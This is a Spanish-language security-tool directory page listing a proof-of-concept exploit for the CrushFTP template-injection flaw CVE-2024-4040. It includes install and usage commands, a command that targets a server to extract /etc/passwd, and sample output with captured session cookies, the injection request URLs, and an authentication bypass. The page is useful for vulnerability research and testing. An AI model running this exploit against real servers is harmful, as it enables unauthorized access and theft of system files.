Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
GenCrushSSTIExploit — es un PoC para CVE-2024-4040, herramienta para explotar la vulnerabilidad SSTI en CrushFTP | Kitploit
Herramientas/GitHubGitHub/geniuszly/gencrushsstiexploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónAprendizaje y Educación
GitHubgeniuszly/gencrushsstiexploit

GenCrushSSTIExploit

es un PoC para CVE-2024-4040, herramienta para explotar la vulnerabilidad SSTI en CrushFTP

Ver Repositorio
81hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ES

GenCrushSSTIExploit es una herramienta de explotación PoC dirigida a la vulnerabilidad SSTI (Server-Side Template Injection) en CrushFTP CVE-2024-4040. Esta herramienta demuestra cómo explotar esta vulnerabilidad únicamente con fines educativos y de hacking ético.

Características

  • Establece una sesión con el servidor CrushFTP para extraer cookies de autenticación.
  • Explota la vulnerabilidad SSTI para inyectar cargas útiles.
  • Intenta evadir la autenticación y extraer archivos sensibles del servidor.
  • Utiliza rich para una salida de consola hermosa y estilizada.

Aviso Legal

⚠️ ¡Usa esta herramienta de forma responsable! Está destinada únicamente a fines de investigación y educativos. El autor no se hace responsable por el uso indebido o los daños causados por esta herramienta.

Instalación

Requisitos Previos

  • Python 3.7+
  • pip (instalador de paquetes de Python)

Clonar el Repositorio

root@kitploit:~
git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit

Instalar Paquetes Necesarios

root@kitploit:~
pip install -r requirements.txt

Uso

Comando Básico

root@kitploit:~
python GenCrushSSTIExploit.py -t <URL_OBJETIVO>
  • -t / --target: Especifica la URL objetivo del servidor CrushFTP vulnerable.

Parámetros Opcionales

  • -l / --lfi: Inclusión de Archivos Locales. Especifica el archivo a incluir para su extracción.
  • -w / --wordlist: Especifica un diccionario para la fuerza bruta de rutas de archivos.

Ejemplo

root@kitploit:~
python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd

Ejemplo de Salida

root@kitploit:~
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------

[*] Подключение к ServerSessionAJAX...

[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987

[*] Попытка эксплуатации уязвимости SSTI...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a

[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com

[*] Попытка обхода аутентификации...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a

[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...
Descargar herramienta